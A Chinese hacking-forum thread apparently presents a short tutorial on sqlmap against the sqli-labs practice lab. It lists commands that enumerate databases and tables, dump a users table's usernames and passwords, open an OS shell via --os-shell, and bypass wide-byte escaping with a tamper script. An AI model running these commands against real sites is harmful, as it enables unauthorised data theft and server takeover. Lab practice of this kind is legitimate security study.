搜索
查看: 1394|回复: 2

SQLmap的基本使用方法

  [复制链接]

45

主题

71

帖子

166

积分

注册会员

Rank: 2

积分
166

注册会员活跃会员

发表于 2021-1-22 22:34:55 | 显示全部楼层 |阅读模式

确定注入点后测试

sqlmap -u http://localhost/sqli/Less-1/?id=1

当前数据库

 sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db

其他数据库

--dbs

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs

数据库内表

-D security --tables

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables

表内字段

-D security -T users --columns

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns

-D security -T users -C username,password --dump

sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump

注入Shell

sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell

宽字节注入

使用 unmagicquotes 方法进行宽字节绕过

sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
个性
回复

使用道具 举报

45

主题

71

帖子

166

积分

注册会员

Rank: 2

积分
166

注册会员活跃会员

 楼主| 发表于 2021-1-22 22:38:19 | 显示全部楼层
新人发帖,大佬们多支持下!
个性
回复 支持 反对

使用道具 举报

145

主题

235

帖子

516

积分

高级会员

中国黑客

Rank: 4

积分
516
QQ
发表于 2021-1-23 16:20:12 来自手机 | 显示全部楼层
谢谢分享!!!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表